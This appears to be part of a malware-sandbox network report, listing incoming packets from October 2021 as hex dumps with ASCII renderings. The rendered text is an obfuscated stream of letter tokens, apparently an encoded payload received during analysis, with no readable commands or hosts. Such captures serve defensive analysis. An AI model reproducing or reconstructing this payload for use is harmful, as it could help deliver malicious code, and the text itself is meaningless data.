2021-10-29 18:50:00 UTC	90	IN	Data Raw: 4f 20 58 6d 20 71 71 6d 20 71 71 44 20 71 71 57 20 71 71 6d 20 45 70 20 70 45 20 57 4f 20 57 6d 20 58 4f 20 58 58 20 71 71 4f 20 4d 70 20 71 71 6d 20 57 4f 20 4a 4f 4a 20 57 4f 20 57 6d 20 58 6d 20 45 4d 20 71 71 45 20 71 4f 4d 20 4d 45 20 44 57 20 44 70 20 57 71 20 57 6d 20 4d 6d 20 71 4a 4f 20 71 71 58 20 4a 20 4d 44 20 57 71 20 6d 58 20 57 44 20 44 71 20 71 4f 58 20 71 58 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 70 20 4d 57 20 70 57 20 57 57 20 58 6d 20 71 4a 4f 20 71 4a 71 20 71 71 71 20 58 58 20 4a 6d 45 20 6d 58 20 57 4f 20 6d 58 20 4d 4a 20 4a 4d 20 4a 71 44 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 6d 20 4a 6d 4d 20 57 6d 20 58 6d 20 71 71 44 20 45 44 20 71 4d 4a 20 71 71 4a 20 57 4f 20 6d 58 20 44 57 20 71 6d 4a 20 58 6d 20 71 71 6d 20 71 71 57 Data Ascii: O Xm qqm qqD qqW qqm Ep pE WO Wm XO XX qqO Mp qqm WO JOJ WO Wm Xm EM qqE qOM ME DW Dp Wq Wm Mm qJO qqX J MD Wq mX WD Dq qOX qXm qqE qOM qqJ Wp MW pW WW Xm qJO qJq qqq XX JmE mX WO mX MJ JM JqD qOX qqJ WJ Jm JmM Wm Xm qqD ED qMJ qqJ WO mX DW qmJ Xm qqm qqW
2021-10-29 18:50:00 UTC	94	IN	Data Raw: 20 4d 70 20 45 20 58 57 20 71 71 6d 20 71 4a 45 20 71 4f 71 20 4d 4f 20 57 4f 20 6d 58 20 6d 71 20 44 20 58 45 20 71 71 6d 20 6d 4a 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 44 20 57 4f 20 57 6d 20 44 4d 20 71 4f 4f 20 4d 70 20 71 58 58 20 71 71 4a 20 57 4f 20 57 6d 20 57 44 20 70 4f 20 71 4f 4a 20 71 71 57 20 71 71 45 20 71 4f 70 20 70 71 20 71 20 6d 4d 20 57 4f 20 44 4f 20 58 58 20 4d 44 20 71 71 4d 20 44 4d 20 44 58 20 57 71 20 6d 58 20 57 44 20 4d 4f 20 58 4a 20 6d 4f 20 4d 70 20 4d 57 20 71 71 70 20 57 4f 20 57 58 20 4d 70 20 57 20 58 57 20 71 71 6d 20 71 4a 45 20 4d 45 20 4d 58 20 6d 58 20 4a 6d 20 45 20 57 57 20 58 6d 20 71 4a 4f 20 4a 57 20 71 4f 45 20 6d 4a 20 57 45 20 58 4d 20 57 70 20 4d 57 20 70 4d 20 44 58 20 71 71 44 20 71 4f 4d 20 71 4a 4a Data Ascii: Mp E XW qqm qJE qOq MO WO mX mq D XE qqm mJ qOM qqJ WO qqD WO Wm DM qOO Mp qXX qqJ WO Wm WD pO qOJ qqW qqE qOp pq q mM WO DO XX MD qqM DM DX Wq mX WD MO XJ mO Mp MW qqp WO WX Mp W XW qqm qJE ME MX mX Jm E WW Xm qJO JW qOE mJ WE XM Wp MW pM DX qqD qOM qJJ
2021-10-29 18:50:00 UTC	97	IN	Data Raw: 20 71 71 45 20 71 4f 4d 20 58 58 20 71 4a 44 20 6d 4d 20 57 4f 20 44 4f 20 6d 4a 20 58 4a 20 71 71 44 20 71 4f 4d 20 71 71 44 20 4a 70 20 4a 4d 20 70 45 20 71 44 20 6d 4a 20 71 4f 58 20 71 71 44 20 71 4f 4d 20 71 71 44 20 4a 4f 6d 20 57 6d 20 71 58 20 57 4a 20 58 6d 20 71 71 44 20 44 20 70 4a 20 71 71 70 20 57 4f 20 57 58 20 4a 70 20 71 58 4a 20 71 71 44 20 71 71 57 20 71 71 45 20 71 4f 57 20 58 58 20 4a 70 20 6d 58 20 57 4f 20 4a 4d 20 71 4a 6d 20 58 6d 20 71 71 45 20 71 4f 4d 20 4d 71 20 4d 70 20 71 4a 45 20 57 71 20 57 6d 20 4d 6d 20 4a 4d 20 70 45 20 71 4f 58 20 71 71 4a 20 57 44 20 4d 57 20 4d 4d 20 57 57 20 58 6d 20 71 4a 4f 20 71 4a 45 20 45 4f 20 45 45 20 57 4a 20 4d 57 20 4d 44 20 57 57 20 58 6d 20 71 4a 4f 20 71 4a 44 20 71 4f 44 20 70 71 20 4d Data Ascii: qqE qOM XX qJD mM WO DO mJ XJ qqD qOM qqD Jp JM pE qD mJ qOX qqD qOM qqD JOm Wm qX WJ Xm qqD D pJ qqp WO WX Jp qXJ qqD qqW qqE qOW XX Jp mX WO JM qJm Xm qqE qOM Mq Mp qJE Wq Wm Mm JM pE qOX qqJ WD MW MM WW Xm qJO qJE EO EE WJ MW MD WW Xm qJO qJD qOD pq M
2021-10-29 18:50:00 UTC	101	IN	Data Raw: 71 44 20 70 57 20 57 6d 20 70 58 20 58 4d 20 71 58 57 20 71 71 6d 20 71 71 45 20 71 4f 70 20 70 71 20 71 58 71 20 6d 58 20 57 4f 20 44 4f 20 71 4a 6d 20 71 58 6d 20 71 71 45 20 71 4f 4d 20 71 71 58 20 4d 70 20 71 44 4d 20 57 71 20 57 6d 20 58 4a 20 4d 4d 20 71 71 70 20 4a 20 4a 70 4a 20 57 71 20 6d 58 20 57 4a 20 4a 44 20 45 58 20 4d 4d 20 71 71 70 20 71 4a 6d 20 71 71 44 20 4d 70 20 71 44 58 20 57 71 20 57 6d 20 58 4a 20 4d 4f 20 71 71 20 71 4f 58 20 71 71 4a 20 57 44 20 4d 57 20 45 45 20 57 57 20 58 6d 20 71 4a 4f 20 4a 44 20 4a 57 4f 20 71 71 70 20 57 4f 20 57 6d 20 4a 57 20 57 58 20 44 4d 20 71 71 58 20 45 20 71 70 6d 20 71 4a 44 20 57 4f 20 44 6d 20 4d 70 20 71 44 71 20 58 57 20 71 71 6d 20 71 71 57 20 71 4f 45 20 4d 45 20 57 6d 20 4d 57 20 71 45 58 Data Ascii: qD pW Wm pX XM qXW qqm qqE qOp pq qXq mX WO DO qJm qXm qqE qOM qqX Mp qDM Wq Wm XJ MM qqp J JpJ Wq mX WJ JD EX MM qqp qJm qqD Mp qDX Wq Wm XJ MO qq qOX qqJ WD MW EE WW Xm qJO JD JWO qqp WO Wm JW WX DM qqX E qpm qJD WO Dm Mp qDq XW qqm qqW qOE ME Wm MW qEX
2021-10-29 18:50:00 UTC	105	IN	Data Raw: 57 4f 20 71 4a 6d 20 44 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 44 57 20 58 20 57 4f 20 57 6d 20 4d 6d 20 71 4f 4d 20 71 4a 70 20 4a 4a 6d 20 6d 4a 20 57 4f 20 6d 58 20 57 71 20 71 4d 20 71 70 4a 20 71 45 4d 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 44 20 45 20 57 4f 20 57 6d 20 4d 6d 20 71 20 45 45 20 71 4f 4d 20 71 71 4a 20 57 44 20 70 70 20 57 58 20 70 4f 20 71 4a 45 20 71 71 6d 20 71 71 45 20 71 4f 70 20 70 20 45 57 20 6d 4d 20 57 4f 20 44 4f 20 45 71 20 71 4a 70 20 71 4f 4f 20 71 4f 4f 20 70 71 20 44 57 20 6d 4d 20 57 4f 20 44 4f 20 45 71 20 71 4a 4f 20 71 4f 4f 20 71 4f 70 20 70 71 20 45 4f 20 6d 4d 20 57 4f 20 44 4f 20 45 71 20 71 71 44 20 4d 6d 20 71 57 20 4d 45 20 57 4a 20 4d 57 20 45 71 20 57 57 20 58 6d 20 71 4a 4f 20 71 4f 4a 20 71 4f 4a 20 Data Ascii: WO qJm DM qqE qOM qJJ DW X WO Wm Mm qOM qJp JJm mJ WO mX Wq qM qpJ qEM qqE qOM qqD JD E WO Wm Mm q EE qOM qqJ WD pp WX pO qJE qqm qqE qOp p EW mM WO DO Eq qJp qOO qOO pq DW mM WO DO Eq qJO qOO qOp pq EO mM WO DO Eq qqD Mm qW ME WJ MW Eq WW Xm qJO qOJ qOJ
2021-10-29 18:50:00 UTC	109	IN	Data Raw: 20 57 6d 20 58 6d 20 71 71 6d 20 71 6d 70 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 4f 20 57 71 20 57 6d 20 58 6d 20 71 4a 4f 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 58 20 57 4f 20 6d 58 20 57 4f 20 4a 58 20 58 57 20 71 71 6d 20 71 71 45 20 4d 70 20 71 71 70 20 57 4f 20 6d 58 20 6d 4d 20 57 6d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 4d 20 71 71 4a 20 57 71 20 6d 70 20 4a 20 57 70 20 58 6d 20 6d 4d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 4d 4d 20 6d 58 20 57 4f 20 70 4d 20 70 4d 20 4a 71 70 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 57 44 20 4a 6d 20 71 58 4f 20 57 57 20 58 6d 20 71 4a 4f 20 4d 70 20 44 4d 20 71 71 4a 20 57 4f 20 4a 45 20 45 44 20 4a 71 20 58 57 20 71 71 6d 20 Data Ascii: Wm Xm qqm qmp qOM qqJ WO JO Wq Wm Xm qJO qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqX WO mX WO JX XW qqm qqE Mp qqp WO mX mM Wm Xm qqm qJE qOM qqJ Wq mp J Wp Xm mM qqE qOM qqJ MM mX WO pM pM Jqp qqE qOM qJJ WD Jm qXO WW Xm qJO Mp DM qqJ WO JE ED Jq XW qqm
2021-10-29 18:50:00 UTC	114	IN	Data Raw: 58 20 44 6d 20 57 57 20 6d 58 20 71 4a 57 20 57 6d 20 58 6d 20 71 71 6d 20 70 4a 20 71 4f 4d 20 71 71 4a 20 70 57 20 57 4f 20 70 45 20 71 58 45 20 71 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 70 44 20 6d 45 20 71 71 4f 20 71 45 71 20 44 45 20 4a 4d 20 71 58 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 58 20 57 4a 20 6d 58 20 4a 71 58 20 4a 45 20 71 4f 4d 20 57 4a 20 4a 70 6d 20 6d 57 20 57 45 20 71 4d 71 20 71 4f 58 20 58 6d 20 71 71 6d 20 71 71 44 20 45 4a 20 71 44 4f 20 71 4d 57 20 6d 58 20 57 4f 20 57 4f 20 71 4a 6d 20 44 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 44 57 20 58 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 58 4f 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 58 20 57 44 20 6d 58 20 58 4a 20 4a 57 4a 20 4a 58 20 71 4a 4a 20 6d 71 20 71 44 58 20 57 4d Data Ascii: X Dm WW mX qJW Wm Xm qqm pJ qOM qqJ pW WO pE qXE qm qqm qqE qOX XW pD mE qqO qEq DE JM qX qOM qqJ WD WX WJ mX JqX JE qOM WJ Jpm mW WE qMq qOX Xm qqm qqD EJ qDO qMW mX WO WO qJm DM qqE qOM qJJ DW X WO Wm Mm JM XO qOM qqJ WD JX WD mX XJ JWJ JX qJJ mq qDX WM
2021-10-29 18:50:00 UTC	118	IN	Data Raw: 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 4f 20 45 70 20 71 71 45 20 58 6d 20 71 71 6d 20 71 71 70 20 71 4d 20 6d 20 57 4f 20 6d 58 20 57 44 20 70 4f 20 71 4d 4d 20 71 71 57 20 71 71 45 20 71 4f 70 20 4d 4a 20 57 45 20 57 4f 20 45 70 20 71 71 45 20 58 6d 20 71 71 6d 20 71 71 70 20 44 4d 20 4a 20 57 4f 20 6d 58 20 57 44 20 57 4a 20 6d 45 20 57 70 20 71 71 45 20 71 4f 4d 20 71 71 44 20 45 44 20 44 58 20 57 4f 20 57 6d 20 4d 6d 20 4d 4f 20 4a 70 4f 20 71 4f 58 20 71 71 4a 20 57 44 20 4a 58 20 57 45 20 57 4a 20 6d 45 20 57 70 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 44 20 44 44 20 57 4f 20 57 6d 20 4d 6d 20 71 71 4a 20 71 6d 20 6d 4f 20 71 71 4a 20 57 4f 20 57 4a 20 45 44 20 44 44 20 58 6d 20 71 71 6d 20 71 4a 45 20 44 4d 20 4a 4a 45 20 57 71 20 6d 58 Data Ascii: qqE qOM qqJ WO WO Ep qqE Xm qqm qqp qM m WO mX WD pO qMM qqW qqE qOp MJ WE WO Ep qqE Xm qqm qqp DM J WO mX WD WJ mE Wp qqE qOM qqD ED DX WO Wm Mm MO JpO qOX qqJ WD JX WE WJ mE Wp qqE qOM qqD JD DD WO Wm Mm qqJ qm mO qqJ WO WJ ED DD Xm qqm qJE DM JJE Wq mX
2021-10-29 18:50:00 UTC	122	IN	Data Raw: 45 6d 20 71 71 4a 20 71 6d 20 4a 57 6d 20 71 71 4a 20 57 4f 20 57 4a 20 4a 6d 20 4a 4f 20 58 44 20 71 71 70 20 58 20 4a 57 6d 20 71 71 4a 20 57 4f 20 57 4a 20 4a 6d 20 6d 4f 20 58 44 20 4d 20 4a 4a 57 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 44 20 71 44 20 57 4a 20 58 45 20 71 57 20 4a 4a 57 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 44 20 6d 6d 20 57 4a 20 6d 45 20 4a 70 71 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 6d 20 71 58 20 6d 58 20 57 70 20 6d 71 20 4a 70 71 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 6d 20 6d 44 20 6d 58 20 45 45 20 71 4d 6d 20 71 71 6d 20 71 71 45 20 71 4f 57 20 4d 4f 20 71 44 20 57 4f 20 6d 4d 20 45 57 20 71 4d 6d 20 71 71 6d 20 71 71 45 20 71 4f 57 20 4d 4f 20 6d 6d 20 57 4f 20 45 70 20 71 44 71 20 58 6d 20 71 71 6d 20 71 71 70 20 45 Data Ascii: Em qqJ qm JWm qqJ WO WJ Jm JO XD qqp X JWm qqJ WO WJ Jm mO XD M JJW qOM qqJ Wm JD qD WJ XE qW JJW qOM qqJ Wm JD mm WJ mE Jpq qqE qOM qqD Jm qX mX Wp mq Jpq qqE qOM qqD Jm mD mX EE qMm qqm qqE qOW MO qD WO mM EW qMm qqm qqE qOW MO mm WO Ep qDq Xm qqm qqp E
2021-10-29 18:50:00 UTC	126	IN	Data Raw: 44 20 57 4f 20 57 6d 20 58 57 20 58 45 20 4d 4d 20 71 71 6d 20 45 6d 20 71 45 57 20 4d 57 20 4a 70 44 20 57 6d 20 58 6d 20 71 4a 4f 20 4d 58 20 4a 6d 45 20 4a 20 71 58 4d 20 70 44 20 57 4f 20 45 4f 20 71 4a 6d 20 6d 45 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 6d 20 70 4d 20 4a 6d 20 57 6d 20 58 6d 20 4d 45 20 44 4d 20 71 71 71 20 71 71 4a 20 71 4a 45 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 57 20 4d 70 20 71 6d 58 20 57 71 20 57 6d 20 4d 6d 20 71 4f 71 20 45 4f 20 6d 45 20 71 71 57 20 70 44 20 4d 57 20 71 57 71 20 57 57 20 58 6d 20 71 4a 4f 20 58 4d 20 58 6d 20 71 71 57 20 4d 70 20 71 4a 45 20 57 71 20 57 6d 20 4d 6d 20 4a 4d 20 4a 71 71 20 71 4f 58 20 71 71 4a 20 57 44 20 4d 57 20 71 6d 4d 20 57 57 20 58 6d 20 71 Data Ascii: D WO Wm XW XE MM qqm Em qEW MW JpD Wm Xm qJO MX JmE J qXM pD WO EO qJm mE qqE qOM qJJ Jm pM Jm Wm Xm ME DM qqq qqJ qJE mX WO Wm Xm qqm qqE qOM qqW Mp qmX Wq Wm Mm qOq EO mE qqW pD MW qWq WW Xm qJO XM Xm qqW Mp qJE Wq Wm Mm JM Jqq qOX qqJ WD MW qmM WW Xm q
2021-10-29 18:50:00 UTC	129	IN	Data Raw: 58 20 57 4f 20 57 20 70 20 45 4f 20 71 4a 4f 20 71 71 44 20 71 71 45 20 6d 45 20 45 57 20 71 6d 45 20 57 20 57 4a 20 57 6d 20 71 45 57 20 57 71 20 57 20 44 57 20 71 71 58 20 57 4f 20 71 70 6d 20 71 58 20 45 4f 20 71 4a 4f 20 71 71 44 20 71 71 45 20 71 4d 45 20 58 4d 20 71 4d 6d 20 6d 71 20 57 4a 20 57 6d 20 4d 4a 20 58 70 20 71 70 70 20 71 71 44 20 71 71 58 20 57 4f 20 44 70 20 71 71 6d 20 45 4f 20 71 4a 4f 20 71 71 44 20 71 71 45 20 4a 4f 6d 20 45 6d 20 44 44 20 4a 58 20 57 4a 20 57 6d 20 4a 4f 58 20 45 44 20 57 20 44 57 20 4a 57 71 20 57 71 20 71 4a 45 20 4f 20 57 6d 20 58 6d 20 71 4a 6d 20 71 71 45 20 4a 57 4f 20 44 57 20 4a 71 6d 20 4a 45 20 44 4f 20 57 6d 20 4a 6d 20 45 44 20 71 6d 57 20 45 4f 20 71 4a 44 20 57 4f 20 4a 4d 20 71 71 6d 20 4a 71 4f 20 Data Ascii: X WO W p EO qJO qqD qqE mE EW qmE W WJ Wm qEW Wq W DW qqX WO qpm qX EO qJO qqD qqE qME XM qMm mq WJ Wm MJ Xp qpp qqD qqX WO Dp qqm EO qJO qqD qqE JOm Em DD JX WJ Wm JOX ED W DW JWq Wq qJE O Wm Xm qJm qqE JWO DW Jqm JE DO Wm Jm ED qmW EO qJD WO JM qqm JqO
2021-10-29 18:50:00 UTC	133	IN	Data Raw: 20 71 71 45 20 57 4a 20 71 71 70 20 4a 4a 20 6d 58 20 6d 4f 20 57 57 20 4d 70 20 71 71 57 20 71 4f 71 20 71 4f 4d 20 71 4d 45 20 71 71 70 20 6d 58 20 57 4f 20 71 71 71 20 58 57 20 58 6d 20 71 71 45 20 71 71 4d 20 71 71 70 20 57 4d 20 6d 4d 20 70 6d 20 57 6d 20 4a 57 6d 20 6d 4d 20 71 71 45 20 71 4f 4d 20 6d 71 20 57 71 20 4a 57 20 57 4f 20 6d 6d 20 58 57 20 71 71 57 20 71 71 45 20 71 4a 57 20 71 71 4a 20 58 6d 20 70 70 20 57 4f 20 57 6d 20 71 4a 57 20 71 71 6d 20 4d 57 20 71 4f 4d 20 71 4f 44 20 57 71 20 6d 4d 20 57 4f 20 70 58 20 58 6d 20 71 45 71 20 71 4f 4f 20 71 4f 4d 20 71 71 4a 20 4a 45 20 6d 58 20 70 4f 20 57 6d 20 45 57 20 71 71 57 20 71 71 44 20 71 4f 4d 20 4d 44 20 57 4f 20 4f 20 57 4f 20 57 6d 20 58 6d 20 4d 71 20 71 71 45 20 4d 57 20 71 71 4a Data Ascii: qqE WJ qqp JJ mX mO WW Mp qqW qOq qOM qME qqp mX WO qqq XW Xm qqE qqM qqp WM mM pm Wm JWm mM qqE qOM mq Wq JW WO mm XW qqW qqE qJW qqJ Xm pp WO Wm qJW qqm MW qOM qOD Wq mM WO pX Xm qEq qOO qOM qqJ JE mX pO Wm EW qqW qqD qOM MD WO O WO Wm Xm Mq qqE MW qqJ
2021-10-29 18:50:00 UTC	137	IN	Data Raw: 71 20 57 58 20 57 57 20 44 4d 20 70 44 20 4a 6d 57 20 70 45 20 71 4a 70 20 57 71 20 70 70 20 57 71 20 57 6d 20 58 20 71 71 4f 20 4a 71 71 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 4a 58 20 6d 71 20 71 6d 6d 20 58 6d 20 71 71 57 20 71 71 45 20 71 58 4a 20 71 4f 45 20 71 6d 58 20 6d 58 20 57 71 20 57 6d 20 58 4a 20 71 71 4f 20 71 71 57 20 71 4a 6d 20 71 71 70 20 57 4f 20 4a 70 57 20 6d 44 20 71 6d 6d 20 58 6d 20 71 71 57 20 71 71 45 20 4a 4a 71 20 71 4f 45 20 71 6d 58 20 6d 58 20 57 71 20 57 6d 20 71 6d 70 20 71 4f 57 20 4a 71 71 20 71 4f 4d 20 71 71 70 20 57 4f 20 57 6d 20 6d 44 20 44 70 20 44 4d 20 71 71 44 20 71 71 45 20 71 45 58 20 58 45 20 70 70 20 70 70 20 57 4a 20 57 6d 20 71 71 57 20 58 71 20 71 4f 4a 20 71 4a 6d 20 71 71 58 20 57 4f 20 4a 6d 45 20 71 Data Ascii: q WX WW DM pD JmW pE qJp Wq pp Wq Wm X qqO Jqq qOM qqp WO qJX mq qmm Xm qqW qqE qXJ qOE qmX mX Wq Wm XJ qqO qqW qJm qqp WO JpW mD qmm Xm qqW qqE JJq qOE qmX mX Wq Wm qmp qOW Jqq qOM qqp WO Wm mD Dp DM qqD qqE qEX XE pp pp WJ Wm qqW Xq qOJ qJm qqX WO JmE q
2021-10-29 18:50:00 UTC	141	IN	Data Raw: 71 20 70 70 20 71 20 57 57 20 4a 58 20 71 4a 4a 20 71 4d 44 20 71 4a 6d 20 44 45 20 57 71 20 71 45 58 20 70 45 20 70 45 20 44 4d 20 44 57 20 71 71 44 20 44 4d 20 71 71 58 20 71 70 71 20 70 70 20 71 20 57 57 20 6d 6d 20 71 4f 44 20 71 57 4f 20 71 4a 6d 20 44 45 20 57 71 20 57 70 20 44 71 20 71 45 58 20 44 4d 20 44 57 20 71 71 44 20 71 4d 4d 20 4d 44 20 71 45 57 20 70 70 20 71 20 57 57 20 71 44 71 20 4d 45 20 71 4f 71 20 71 4a 45 20 44 45 20 57 71 20 4d 58 20 44 70 20 70 57 20 45 4f 20 44 57 20 71 71 44 20 4a 4a 57 20 71 4f 4a 20 4a 70 57 20 70 70 20 71 20 57 57 20 57 20 4d 45 20 71 45 4a 20 71 4a 6d 20 44 45 20 57 71 20 4a 4a 58 20 70 45 20 70 45 20 44 4d 20 44 57 20 71 71 44 20 4a 57 4a 20 71 71 4d 20 71 6d 4d 20 70 70 20 71 20 57 57 20 4a 4a 4f 20 71 4a Data Ascii: q pp q WW JX qJJ qMD qJm DE Wq qEX pE pE DM DW qqD DM qqX qpq pp q WW mm qOD qWO qJm DE Wq Wp Dq qEX DM DW qqD qMM MD qEW pp q WW qDq ME qOq qJE DE Wq MX Dp pW EO DW qqD JJW qOJ JpW pp q WW W ME qEJ qJm DE Wq JJX pE pE DM DW qqD JWJ qqM qmM pp q WW JJO qJ
2021-10-29 18:50:00 UTC	146	IN	Data Raw: 71 70 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 71 4a 20 58 4f 20 6d 71 20 71 58 57 20 70 6d 20 6d 4d 20 71 71 6d 20 45 70 20 6d 44 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 58 6d 20 70 20 71 4f 58 20 70 4f 20 71 4f 4f 20 58 6d 20 6d 58 20 44 44 20 71 71 45 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 44 20 57 4f 20 71 58 70 20 57 20 71 58 4a 20 44 6d 20 4a 71 20 71 71 45 20 4a 4f 71 20 57 71 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 4a 71 4f 20 71 71 6d 20 4a 6d 57 20 71 71 44 20 70 20 70 58 20 58 58 20 57 4f 20 4a 70 58 20 4a 70 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 58 4f 20 6d 58 20 4a 4a 44 20 4f 20 70 4d 20 71 4f 4a 20 4a 58 20 71 4f 4d 20 71 4a 6d 20 71 71 58 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 Data Ascii: qp Wm Xm qqm qqE JpW qqJ XO mq qXW pm mM qqm Ep mD qqJ WO mX WO qED Xm p qOX pO qOO Xm mX DD qqE Xm qqm qqE qOM JmD WO qXp W qXJ Dm Jq qqE JOq Wq WO mX WO Wm JqO qqm JmW qqD p pX XX WO JpX Jp qqm qqE qOM qqJ qXO mX JJD O pM qOJ JX qOM qJm qqX mX WO Wm Xm
2021-10-29 18:50:00 UTC	150	IN	Data Raw: 20 71 44 4d 20 45 45 20 71 44 6d 20 70 45 20 71 58 20 57 57 20 71 57 45 20 4a 71 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 58 4a 20 6d 4a 20 71 4d 4f 20 4d 44 20 71 71 57 20 71 71 45 20 45 44 20 71 71 70 20 4a 70 4f 20 58 45 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 45 4d 20 71 4f 4d 20 6d 57 20 4f 20 71 45 45 20 70 4d 20 4a 70 20 58 57 20 6d 4a 20 4a 4d 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 4a 6d 6d 20 57 6d 20 4a 70 4f 20 45 6d 20 4a 57 6d 20 71 4a 4f 20 58 70 20 57 71 20 4d 4a 20 58 4d 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 4a 4f 20 4a 57 4a 20 58 20 71 45 70 20 70 57 20 71 71 4d 20 71 71 57 20 71 20 44 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 4d 4a 20 71 45 4a 20 45 45 20 4a 4f 4a 20 71 4f 71 20 71 Data Ascii: qDM EE qDm pE qX WW qWE Jq qqE qOM qqJ WO qXJ mJ qMO MD qqW qqE ED qqp JpO XE WO Wm Xm qqm qEM qOM mW O qEE pM Jp XW mJ JM qOM qqJ WO mX Jmm Wm JpO Em JWm qJO Xp Wq MJ XM Wm Xm qqm qqE JpW qJO JWJ X qEp pW qqM qqW q D qqJ WO mX WO qED MJ qEJ EE JOJ qOq q
2021-10-29 18:50:00 UTC	154	IN	Data Raw: 20 4a 71 20 71 71 44 20 71 58 71 20 4a 4f 58 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 4a 71 4f 20 71 4f 44 20 4a 57 70 20 58 4d 20 71 71 70 20 57 4f 20 58 58 20 57 71 20 4a 71 6d 20 4a 6d 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 58 4f 20 57 44 20 4a 70 57 20 57 58 20 71 57 45 20 71 71 6d 20 4a 4d 20 71 4f 58 20 71 57 4a 20 71 6d 44 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 4a 6d 6d 20 71 4a 57 20 71 6d 4f 20 71 4a 6d 20 70 6d 20 6d 58 20 4d 4f 20 57 57 20 71 44 57 20 4a 71 4f 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 58 4a 20 57 58 20 71 71 70 20 58 4f 20 71 58 45 20 71 71 45 20 6d 20 71 71 70 20 4a 4f 70 20 71 6d 6d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 4a 6d 70 20 71 4f 71 20 44 70 20 57 6d 20 70 4a 20 57 4f 20 4d 57 20 58 57 20 Data Ascii: Jq qqD qXq JOX WO mX WO Wm JqO qOD JWp XM qqp WO XX Wq Jqm Jmm qqm qqE qOM qqJ qXO WD JpW WX qWE qqm JM qOX qWJ qmD mX WO Wm Xm Jmm qJW qmO qJm pm mX MO WW qDW JqO qqE qOM qqJ WO qXJ WX qqp XO qXE qqE m qqp JOp qmm WO Wm Xm qqm Jmp qOq Dp Wm pJ WO MW XW
2021-10-29 18:50:00 UTC	158	IN	Data Raw: 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 4a 6d 70 20 71 4f 71 20 4a 4f 57 20 57 58 20 57 70 20 57 4f 20 71 45 57 20 58 57 20 45 44 20 4a 71 6d 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 4f 20 44 4a 20 71 4f 6d 20 71 4a 71 20 71 58 58 20 71 4f 4d 20 4a 70 6d 20 57 71 20 71 71 58 20 71 6d 57 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 4a 4f 20 71 71 58 20 57 4d 20 70 6d 20 57 6d 20 4a 4f 44 20 71 71 57 20 57 58 20 4a 4f 44 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 45 44 20 4a 57 4f 20 44 57 20 71 4f 58 20 71 71 4a 20 71 44 4d 20 6d 4d 20 71 4f 71 20 71 6d 4d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 44 20 57 58 20 71 71 4d 20 57 6d 20 4a 57 57 20 58 6d 20 4a 70 70 20 71 71 44 20 57 4f 20 4a 71 71 20 57 4f 20 Data Ascii: WO Wm Xm qqm Jmp qOq JOW WX Wp WO qEW XW ED Jqm qOM qqJ WO mX qXO DJ qOm qJq qXX qOM Jpm Wq qqX qmW Wm Xm qqm qqE JpW qJO qqX WM pm Wm JOD qqW WX JOD qqJ WO mX WO qED ED JWO DW qOX qqJ qDM mM qOq qmM Xm qqm qqE qOM JmD WX qqM Wm JWW Xm Jpp qqD WO Jqq WO
